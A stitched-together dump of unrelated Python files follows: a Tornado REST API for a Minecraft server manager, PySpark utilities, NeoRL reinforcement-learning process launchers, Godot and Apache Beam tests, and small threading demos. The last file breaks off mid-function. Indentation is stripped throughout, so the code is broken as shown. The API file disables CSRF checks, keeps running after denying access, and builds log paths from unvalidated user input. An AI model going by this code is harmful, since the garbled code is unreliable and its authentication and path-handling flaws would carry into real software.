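    proxy = xmlrpc.client.ServerProxy(f'http://localhost:{port}')
    vote = {'candidate': 'Some Candidate', 'name': 'Some Voter', 'cpf': '00000000000'}
    return proxy.homologate_vote(vote)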
if __name__ == "__main__":
port = int(sys.argv[1])
homologator = Homologator(addr=('localhost', port))
homologator.start()
election_coordinator = xmlrpc.client.ServerProxy(RPC_SERVER_URI)
try:
election_coordinator.add_homologator(port)
except xmlrpc.client.ProtocolError as err:
print("Error occurred")
|
api.py
|
import os
import secrets
import threading
import tornado.web
import tornado.escape
import logging.config
from app.classes.models import Roles, Users, check_role_permission, Remote, model_to_dict
from app.classes.multiserv import multi
from app.classes.helpers import helper
from app.classes.backupmgr import backupmgr
logger = logging.getLogger(__name__)
class BaseHandler(tornado.web.RequestHandler):
def check_xsrf_cookie(self):
# Disable CSRF protection on API routes
pass
def return_response(self, status, errors, data, messages):
# Define a standardized response
self.write({
"status": status,
"data": data,
"errors": errors,
"messages": messages
})
def access_denied(self, user):
logger.info("User %s was denied access to API route", user)
self.set_status(403)
self.finish(self.return_response(403, {'error':'ACCESS_DENIED'}, {}, {'info':'You were denied access to the requested resource'}))
def authenticate_user(self, token):
try:
logger.debug("Searching for specified token")
user_data = Users.get(api_token=token)
logger.debug("Checking results")
if user_data:
# Login successful! Return the username
logger.info("User {} has authenticated to API".format(user_data.username))
return user_data.username
else:
                logger.debug("Auth unsuccessful")
return None
        except Exception:
            logger.warning("Traceback occurred when authenticating user to API. Most likely a wrong token")
            return None
class SendCommand(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
command = self.get_body_argument('command', default=None, strip=True)
server_id = self.get_argument('id')
if command:
server = multi.get_server_obj(server_id)
            if server.check_running():
server.send_command(command)
self.return_response(200, '', {"run": True}, '')
else:
self.return_response(200, {'error':'SER_NOT_RUNNING'}, {}, {})
else:
self.return_response(200, {'error':'NO_COMMAND'}, {}, {})
class GetHostStats(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
stats = multi.get_host_status()
        stats.pop('time') # We don't need the request time
self.return_response(200, {}, stats, {})
class GetServerStats(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
stats = multi.get_stats_for_servers()
data = []
for server in stats:
server = stats[server]
            server.pop('time') # We don't need the request time
data.append(server)
self.return_response(200, {}, data, {})
class SearchMCLogs(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
search_string = self.get_argument('query', default=None, strip=True)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
logfile = os.path.join(server.server_path, 'logs', 'latest.log')
data = helper.search_file(logfile, search_string)
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class GetMCLogs(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
logfile = os.path.join(server.server_path, 'logs', 'latest.log')
data = helper.search_file(logfile, '')
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class GetCraftyLogs(BaseHandler):
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
filename = self.get_argument('name')
logfile = os.path.join('logs', filename + '.log')
data = helper.search_file(logfile, '')
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class SearchCraftyLogs(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
filename = self.get_argument('name')
query = self.get_argument('query')
logfile = os.path.join('logs', filename + '.log')
data = helper.search_file(logfile, query)
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class ForceServerBackup(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'backups'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
backup_thread = threading.Thread(name='backup', target=server.backup_server, daemon=False)
backup_thread.start()
self.return_response(200, {}, {'code':'SER_BAK_CALLED'}, {})
class StartServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
if not server.check_running():
Remote.insert({
Remote.command: 'start_mc_server',
Remote.server_id: server_id,
Remote.command_source: "localhost"
}).execute()
self.return_response(200, {}, {'code':'SER_START_CALLED'}, {})
else:
self.return_response(500, {'error':'SER_RUNNING'}, {}, {})
class StopServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
if server.check_running():
Remote.insert({
Remote.command: 'stop_mc_server',
Remote.server_id: server_id,
Remote.command_source: "localhost"
}).execute()
self.return_response(200, {}, {'code':'SER_STOP_CALLED'}, {})
else:
self.return_response(500, {'error':'SER_NOT_RUNNING'}, {}, {})
class RestartServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
server.restart_threaded_server()
self.return_response(200, {}, {'code':'SER_RESTART_CALLED'}, {})
class CreateUser(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'config'):
self.access_denied(user)
new_username = self.get_argument("username")
# TODO: implement role checking
#new_role = self.get_argument("role", 'Mod')
if new_username:
new_pass = helper.random_string_generator()
new_token = secrets.token_urlsafe(32)
result = Users.insert({
Users.username: new_username,
Users.role: 'Mod',
Users.password: helper.encode_pass(new_pass),
Users.api_token: new_token
}).execute()
self.return_response(200, {}, {'code':'COMPLETE', 'username': new_username, 'password': new_pass, 'api_token': new_token}, {})
else:
            self.return_response(500, {'error':'MISSING_PARAMS'}, {}, {'info':'Some parameters failed validation'})
class DeleteUser(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'config'):
self.access_denied(user)
username = self.get_argument("username", None, True)
if username == 'Admin':
self.return_response(500, {'error':'NOT_ALLOWED'}, {}, {'info':'You cannot delete the admin user'})
else:
if username:
Users.delete().where(Users.username == username).execute()
self.return_response(200, {}, {'code':'COMPLETED'}, {})
class ListServers(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access'):
self.access_denied(user)
self.return_response(200, {}, {"code": "COMPLETED", "servers": multi.list_servers()}, {})
|
multiproc.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 09:33:45 2020
@author: majdi
"""
import os, random
#import tensorflow as tf
#tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
# import input parameters from the user
from neorl.parsers.PARSER import InputChecker
from neorl.rl.runners.dqn import DQNAgent
from neorl.rl.runners.ppo2 import PPOAgent
from neorl.rl.runners.a2c import A2CAgent
from neorl.rl.runners.acer import ACERAgent
from multiprocessing import Process
from neorl.evolu.runners.ga import GAAgent
from neorl.evolu.runners.sa import SAAgent
from neorl.utils.neorlcalls import SavePlotCallback
from neorl.rl.baselines.shared.callbacks import BaseCallback
class MultiProc (InputChecker):
def __init__ (self, inp):
self.inp=inp
os.environ["KMP_WARNINGS"] = "FALSE"
#os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def dqn_proc(self):
dqn_callback=SavePlotCallback(check_freq=self.inp.dqn_dict["check_freq"][0], avg_step=self.inp.dqn_dict["avg_episodes"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.dqn_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.dqn_dict["time_steps"][0], basecall=BaseCallback())
dqn=DQNAgent(self.inp, dqn_callback)
dqn.build()
return
def ppo_proc(self):
ppo_callback=SavePlotCallback(check_freq=self.inp.ppo_dict["check_freq"][0], avg_step=self.inp.ppo_dict["avg_episodes"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.ppo_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.ppo_dict["time_steps"][0], basecall=BaseCallback())
ppo=PPOAgent(self.inp, ppo_callback)
ppo.build()
return
def a2c_proc(self):
a2c_callback=SavePlotCallback(check_freq=self.inp.a2c_dict["check_freq"][0], avg_step=self.inp.a2c_dict["avg_episodes"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.a2c_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.a2c_dict["time_steps"][0], basecall=BaseCallback())
a2c=A2CAgent(self.inp, a2c_callback)
a2c.build()
return
def acer_proc(self):
acer_callback=SavePlotCallback(check_freq=self.inp.acer_dict["check_freq"][0], avg_step=self.inp.acer_dict["avg_episodes"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.acer_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.acer_dict["time_steps"][0], basecall=BaseCallback())
acer=ACERAgent(self.inp, acer_callback)
acer.build()
return
def ga_proc(self):
#check_freq is set by default to every generation for GA, so it does not have any effect in the callback
#total_timesteps is set by default to all generations for GA, so it does not have any effect in the callback
ga_callback=SavePlotCallback(check_freq=self.inp.ga_dict["check_freq"][0], avg_step=self.inp.ga_dict["pop"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.ga_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.ga_dict["ngen"][0], basecall=BaseCallback())
ga=GAAgent(self.inp, ga_callback)
ga.build()
return
def sa_proc(self):
#avg_step is set by default to every check_freq, so it does not have any effect in the callback
#total_timesteps is set by default to all generations for SA, so it does not have any effect in the callback
sa_callback=SavePlotCallback(check_freq=self.inp.sa_dict["check_freq"][0], avg_step=self.inp.sa_dict["avg_step"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.sa_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.sa_dict["steps"][0], basecall=BaseCallback())
sa=SAAgent(self.inp, sa_callback)
sa.build()
return
def run_all(self):
# setup all processes
if self.inp.dqn_dict['flag'][0]:
dqn_task = Process(name='dqn', target=self.dqn_proc)
if self.inp.ppo_dict['flag'][0]:
ppo_task = Process(name='ppo', target=self.ppo_proc)
if self.inp.a2c_dict['flag'][0]:
a2c_task = Process(name='a2c', target=self.a2c_proc)
if self.inp.acer_dict['flag'][0]:
acer_task = Process(name='acer', target=self.acer_proc)
if self.inp.ga_dict['flag'][0]:
ga_task = Process(name='ga', target=self.ga_proc)
if self.inp.sa_dict['flag'][0]:
sa_task = Process(name='sa', target=self.sa_proc)
# start running processes
if self.inp.dqn_dict['flag'][0]:
dqn_task.start()
print('--- DQN is running on {cores} core(s)'.format(cores=self.inp.dqn_dict["ncores"][0]))
if self.inp.ppo_dict['flag'][0]:
ppo_task.start()
print('--- PPO is running on {cores} core(s)'.format(cores=self.inp.ppo_dict["ncores"][0]))
if self.inp.a2c_dict['flag'][0]:
a2c_task.start()
print('--- A2C is running on {cores} core(s)'.format(cores=self.inp.a2c_dict["ncores"][0]))
if self.inp.acer_dict['flag'][0]:
acer_task.start()
print('--- ACER is running on {cores} core(s)'.format(cores=self.inp.acer_dict["ncores"][0]))
if self.inp.ga_dict['flag'][0]:
ga_task.start()
print('--- GA is running on {cores} core(s)'.format(cores=self.inp.ga_dict["ncores"][0]))
if self.inp.sa_dict['flag'][0]:
sa_task.start()
print('--- SA is running on {cores} core(s)'.format(cores=self.inp.sa_dict["ncores"][0]))
print('------------------------------------------------------------------------------')
|
util.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import itertools
import os
import platform
import re
import sys
import threading
import traceback
from types import TracebackType
from typing import Any, Callable, Iterator, List, Optional, TextIO, Tuple
from py4j.clientserver import ClientServer # type: ignore[import]
__all__: List[str] = []
from py4j.java_gateway import JavaObject
def print_exec(stream: TextIO) -> None:
ei = sys.exc_info()
traceback.print_exception(ei[0], ei[1], ei[2], None, stream)
class VersionUtils:
"""
Provides utility method to determine Spark versions with given input string.
"""
@staticmethod
def majorMinorVersion(sparkVersion: str) -> Tuple[int, int]:
"""
Given a Spark version string, return the (major version number, minor version number).
E.g., for 2.0.1-SNAPSHOT, return (2, 0).
Examples
--------
>>> sparkVersion = "2.4.0"
>>> VersionUtils.majorMinorVersion(sparkVersion)
(2, 4)
>>> sparkVersion = "2.3.0-SNAPSHOT"
>>> VersionUtils.majorMinorVersion(sparkVersion)
(2, 3)
"""
m = re.search(r"^(\d+)\.(\d+)(\..*)?$", sparkVersion)
if m is not None:
return (int(m.group(1)), int(m.group(2)))
else:
raise ValueError(
"Spark tried to parse '%s' as a Spark" % sparkVersion
+ " version string, but it could not find the major and minor"
+ " version numbers."
)
def fail_on_stopiteration(f: Callable) -> Callable:
"""
Wraps the input function to fail on 'StopIteration' by raising a 'RuntimeError'
prevents silent loss of data when 'f' is used in a for loop in Spark code
"""
def wrapper(*args: Any, **kwargs: Any) -> Any:
try:
return f(*args, **kwargs)
except StopIteration as exc:
raise RuntimeError(
"Caught StopIteration thrown from user's code; failing the task", exc
)
return wrapper
def walk_tb(tb: Optional[TracebackType]) -> Iterator[TracebackType]:
while tb is not None:
yield tb
tb = tb.tb_next
def try_simplify_traceback(tb: TracebackType) -> Optional[TracebackType]:
"""
Simplify the traceback. It removes the tracebacks in the current package, and only
shows the traceback that is related to the thirdparty and user-specified codes.
Returns
-------
TracebackType or None
Simplified traceback instance. It returns None if it fails to simplify.
Notes
-----
This keeps the tracebacks once it sees they are from a different file even
though the following tracebacks are from the current package.
Examples
--------
>>> import importlib
>>> import sys
>>> import traceback
>>> import tempfile
>>> with tempfile.TemporaryDirectory() as tmp_dir:
... with open("%s/dummy_module.py" % tmp_dir, "w") as f:
... _ = f.write(
... 'def raise_stop_iteration():\\n'
... ' raise StopIteration()\\n\\n'
... 'def simple_wrapper(f):\\n'
... ' def wrapper(*a, **k):\\n'
... ' return f(*a, **k)\\n'
... ' return wrapper\\n')
... f.flush()
... spec = importlib.util.spec_from_file_location(
... "dummy_module", "%s/dummy_module.py" % tmp_dir)
... dummy_module = importlib.util.module_from_spec(spec)
... spec.loader.exec_module(dummy_module)
>>> def skip_doctest_traceback(tb):
... import pyspark
... root = os.path.dirname(pyspark.__file__)
... pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
... for cur_tb, cur_frame in pairs:
... if cur_frame.filename.startswith(root):
... return cur_tb
Regular exceptions should show the file name of the current package as below.
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.raise_stop_iteration)()
... except Exception as e:
... tb = sys.exc_info()[-1]
... e.__cause__ = None
... exc_info = "".join(
... traceback.format_exception(type(e), e, tb))
>>> print(exc_info) # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
Traceback (most recent call last):
File ...
...
File "/.../pyspark/util.py", line ...
...
RuntimeError: ...
>>> "pyspark/util.py" in exc_info
True
If the traceback is simplified with this method, it hides the current package file name:
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.raise_stop_iteration)()
... except Exception as e:
... tb = try_simplify_traceback(sys.exc_info()[-1])
... e.__cause__ = None
... exc_info = "".join(
... traceback.format_exception(
... type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
>>> print(exc_info) # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
RuntimeError: ...
>>> "pyspark/util.py" in exc_info
False
In the case below, the traceback contains the current package in the middle.
In this case, it just hides the top occurrence only.
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.simple_wrapper(
... fail_on_stopiteration(dummy_module.raise_stop_iteration)))()
... except Exception as e:
... tb = sys.exc_info()[-1]
... e.__cause__ = None
... exc_info_a = "".join(
... traceback.format_exception(type(e), e, tb))
... exc_info_b = "".join(
... traceback.format_exception(
... type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
>>> exc_info_a.count("pyspark/util.py")
2
>>> exc_info_b.count("pyspark/util.py")
1
"""
if "pypy" in platform.python_implementation().lower():
# Traceback modification is not supported with PyPy in PySpark.
return None
if sys.version_info[:2] < (3, 7):
        # Traceback creation is not supported on Python < 3.7.
# See https://bugs.python.org/issue30579.
return None
import pyspark
root = os.path.dirname(pyspark.__file__)
tb_next = None
new_tb = None
pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
last_seen = []
for cur_tb, cur_frame in pairs:
if not cur_frame.filename.startswith(root):
# Filter the stacktrace from the PySpark source itself.
last_seen = [(cur_tb, cur_frame)]
break
for cur_tb, cur_frame in reversed(list(itertools.chain(last_seen, pairs))):
# Once we have seen the file names outside, don't skip.
new_tb = TracebackType(
tb_next=tb_next,
tb_frame=cur_tb.tb_frame,
tb_lasti=cur_tb.tb_frame.f_lasti,
tb_lineno=cur_tb.tb_frame.f_lineno if cur_tb.tb_frame.f_lineno is not None else -1,
)
tb_next = new_tb
return new_tb
def _print_missing_jar(lib_name: str, pkg_name: str, jar_name: str, spark_version: str) -> None:
print(
"""
________________________________________________________________________________________________
Spark %(lib_name)s libraries not found in class path. Try one of the following.
1. Include the %(lib_name)s library and its dependencies with in the
spark-submit command as
$ bin/spark-submit --packages org.apache.spark:spark-%(pkg_name)s:%(spark_version)s ...
2. Download the JAR of the artifact from Maven Central http://search.maven.org/,
Group Id = org.apache.spark, Artifact Id = spark-%(jar_name)s, Version = %(spark_version)s.
Then, include the jar in the spark-submit command as
$ bin/spark-submit --jars <spark-%(jar_name)s.jar> ...
________________________________________________________________________________________________
"""
% {
"lib_name": lib_name,
"pkg_name": pkg_name,
"jar_name": jar_name,
"spark_version": spark_version,
}
)
def _parse_memory(s: str) -> int:
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MiB
Examples
--------
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {"g": 1024, "m": 1, "t": 1 << 20, "k": 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def inheritable_thread_target(f: Callable) -> Callable:
"""
Return thread target wrapper which is recommended to be used in PySpark when the
    pinned thread mode is enabled. Before calling the original thread target, the
    wrapper function inherits the inheritable properties specific to JVM threads
    such as ``InheritableThreadLocal``.
Also, note that pinned thread mode does not close the connection from Python
to JVM when the thread is finished in the Python side. With this wrapper, Python
garbage-collects the Python thread instance and also closes the connection
which finishes JVM thread correctly.
    When the pinned thread mode is off, it returns the original ``f``.
.. versionadded:: 3.2.0
Parameters
----------
f : function
the original thread target.
Notes
-----
This API is experimental.
It is important to know that it captures the local properties when you decorate it
whereas :class:`InheritableThread` captures when the thread is started.
Therefore, it is encouraged to decorate it when you want to capture the local
properties.
For example, the local properties from the current Spark context is captured
when you define a function here instead of the invocation:
>>> @inheritable_thread_target
... def target_func():
... pass # your codes.
If you have any updates on local properties afterwards, it would not be reflected to
the Spark context in ``target_func()``.
The example below mimics the behavior of JVM threads as close as possible:
>>> Thread(target=inheritable_thread_target(target_func)).start() # doctest: +SKIP
"""
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer):
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
# NOTICE the internal difference vs `InheritableThread`. `InheritableThread`
# copies local properties when the thread starts but `inheritable_thread_target`
# copies when the function is wrapped.
assert SparkContext._active_spark_context is not None
properties = SparkContext._active_spark_context._jsc.sc().getLocalProperties().clone()
@functools.wraps(f)
def wrapped(*args: Any, **kwargs: Any) -> Any:
try:
# Set local properties in child thread.
assert SparkContext._active_spark_context is not None
SparkContext._active_spark_context._jsc.sc().setLocalProperties(properties)
return f(*args, **kwargs)
finally:
InheritableThread._clean_py4j_conn_for_current_thread()
return wrapped
else:
return f
class InheritableThread(threading.Thread):
"""
Thread that is recommended to be used in PySpark instead of :class:`threading.Thread`
when the pinned thread mode is enabled. The usage of this class is exactly same as
:class:`threading.Thread` but correctly inherits the inheritable properties specific
to JVM thread such as ``InheritableThreadLocal``.
Also, note that pinned thread mode does not close the connection from Python
to JVM when the thread is finished in the Python side. With this class, Python
garbage-collects the Python thread instance and also closes the connection
which finishes JVM thread correctly.
When the pinned thread mode is off, this works as :class:`threading.Thread`.
.. versionadded:: 3.1.0
Notes
-----
This API is experimental.
"""
_props: JavaObject
def __init__(self, target: Callable, *args: Any, **kwargs: Any):
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer):
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
def copy_local_properties(*a: Any, **k: Any) -> Any:
# self._props is set before starting the thread to match the behavior with JVM.
assert hasattr(self, "_props")
assert SparkContext._active_spark_context is not None
SparkContext._active_spark_context._jsc.sc().setLocalProperties(self._props)
try:
return target(*a, **k)
finally:
InheritableThread._clean_py4j_conn_for_current_thread()
super(InheritableThread, self).__init__(
target=copy_local_properties, *args, **kwargs # type: ignore[misc]
)
else:
super(InheritableThread, self).__init__(
target=target, *args, **kwargs # type: ignore[misc]
)
def start(self) -> None:
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer):
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
# Local property copy should happen in Thread.start to mimic JVM's behavior.
assert SparkContext._active_spark_context is not None
self._props = SparkContext._active_spark_context._jsc.sc().getLocalProperties().clone()
return super(InheritableThread, self).start()
@staticmethod
def _clean_py4j_conn_for_current_thread() -> None:
from pyspark import SparkContext
jvm = SparkContext._jvm
assert jvm is not None
thread_connection = jvm._gateway_client.get_thread_connection()
if thread_connection is not None:
try:
# Dequeue is shared across other threads but it's thread-safe.
                # If this function has to be invoked one more time in the same thread
# Py4J will create a new connection automatically.
jvm._gateway_client.deque.remove(thread_connection)
except ValueError:
# Should never reach this point
return
finally:
thread_connection.close()
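# Illustrative only (requires an active SparkContext when pinned thread mode is on);
# InheritableThread is used exactly like threading.Thread:
#
#   t = InheritableThread(target=lambda: print("runs with inherited local properties"))
#   t.start()
#   t.join()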
if __name__ == "__main__":
if "pypy" not in platform.python_implementation().lower() and sys.version_info[:2] >= (3, 7):
import doctest
import pyspark.util
from pyspark.context import SparkContext
globs = pyspark.util.__dict__.copy()
globs["sc"] = SparkContext("local[4]", "PythonTest")
(failure_count, test_count) = doctest.testmod(pyspark.util, globs=globs)
globs["sc"].stop()
if failure_count:
sys.exit(-1)
|
test_threads.py
|
import pytest
from threading import Thread
from godot import Vector3, SurfaceTool, Mesh, MeshInstance
def test_simple_thread():
thread_said_hello = False
def target():
nonlocal thread_said_hello
thread_said_hello = True
t = Thread(target=target, daemon=True)
t.start()
t.join(timeout=1)
assert thread_said_hello
def test_use_godot_from_thread():
def target():
st = SurfaceTool()
st.begin(Mesh.PRIMITIVE_TRIANGLES)
st.add_vertex(Vector3(-1, -1, 0))
st.add_vertex(Vector3(-1, 1, 0))
st.add_vertex(Vector3(1, 1, 0))
mesh = st.commit()
mi = MeshInstance.new()
mi.mesh = mesh
mi.free()
t = Thread(target=target, daemon=True)
t.start()
t.join(timeout=1)
|
test_cleaner.py
|
from cleaner import cleaner
from fetcher import fetcher
from parse_config import parse_config
from loader import load_database
from manager import CANNOT_SPAWN, OPS_KILLED, NO_OUTPUT, ExecutorResult
from utils import make_pool
from db_txn import db_execute, db_insert, db_result, db_txn
from functools import partial
from os import _exit
from threading import Condition, Event, Lock, Thread
from uuid import uuid4
import logging, logging.config
def do_setup(acc, user):
print acc, user
uid = str(uuid4())
yield db_execute('''INSERT INTO task(task_identification, status,
site_asset_id, company_id,
task_priority, user_id, clip_duration,
clip_format)
VALUES (%s, 'query', UUID(), %s, 128, %s, 600,
'mp4')''', uid, acc, user)
_, r = yield db_insert('''INSERT INTO taskQueryHis(task_identification)
VALUES (%s)''', uid)
yield db_result(uid, r)
def setup(config, pool, acc, user):
total = 20
rows = {}
for _ in xrange(total):
uid, r = db_txn(pool, partial(do_setup, acc, user))
print uid, r
rows[uid] = r
fetch = fetcher(config, pool, Condition(Lock()), Condition(Lock()))
clean = cleaner(config, pool, Condition(Lock()), Condition(Lock()))
ev = Event()
ev.clear()
load = Thread(target=load_database, args=(config, pool, ev, [fetch, clean])) # @IgnorePep8
load.start()
ev.wait()
fetch.start()
tasks = []
while len(tasks) < total:
print 'already fetched: ', len(tasks), 'tasks'
print 'to fetch tasks from db'
fetch.request(acc)
for r in fetch.replies(True):
ts = r[1]
print 'fetched', len(ts), 'tasks'
for t in ts:
if t.uuid in rows:
tasks.append((t, rows[t.uuid]))
return (clean, tasks)
logging.config.fileConfig('test_log.conf')
config = parse_config('test.conf')
pool = make_pool(config)
account = int(config['test_account'])
user = int(config['test_user'])
clean, tasks = setup(config, pool, account, user)
clean.start()
retry_codes = clean.backend_retry
retry = list(retry_codes)[0]
no_retry = max(retry_codes) + 1
i = 0
for use_row in (True, False):
for code in (0, CANNOT_SPAWN, OPS_KILLED, NO_OUTPUT):
t, r = tasks[i]
i += 1
print 'cleaning task: ', t.id, t.uuid, r
clean.request((t, r if use_row else None, code, None))
for use_row in (True, False):
for exec_code in (0, 1):
for backend_code in (0, retry, no_retry):
print i
t, r = tasks[i]
i += 1
print 'cleaning task: ', t.id, t.uuid, r
res = ExecutorResult(code=exec_code, backend_code=backend_code,
matches=[], crr='')
clean.request((t, r if use_row else None, 0, res))
_exit(0)
|
multiprocessing.py
|
import multiprocessing
import time
def action(a, b):
for i in range(30):
print(a, ' ', b)
time.sleep(0.1)
if __name__ == '__main__':
    jc1 = multiprocessing.Process(target=action, args=('process one', 0))
    jc2 = multiprocessing.Process(target=action, args=('process two', 1))
jc1.start()
jc2.start()
jc1.join()
jc2.join()
    print('jc1 and jc2 have both finished')
jc1.close()
jc2.close()
|
data_plane_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for apache_beam.runners.worker.data_plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import sys
import threading
import unittest
from concurrent import futures
import grpc
from future.utils import raise_
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import data_plane
def timeout(timeout_secs):
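  # Decorator: run the wrapped test in a daemon thread, re-raise any exception
  # it captured, and fail if the thread is still alive after timeout_secs.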
def decorate(fn):
exc_info = []
def wrapper(*args, **kwargs):
def call_fn():
try:
fn(*args, **kwargs)
except: # pylint: disable=bare-except
exc_info[:] = sys.exc_info()
thread = threading.Thread(target=call_fn)
thread.daemon = True
thread.start()
thread.join(timeout_secs)
if exc_info:
t, v, tb = exc_info # pylint: disable=unbalanced-tuple-unpacking
raise_(t, v, tb)
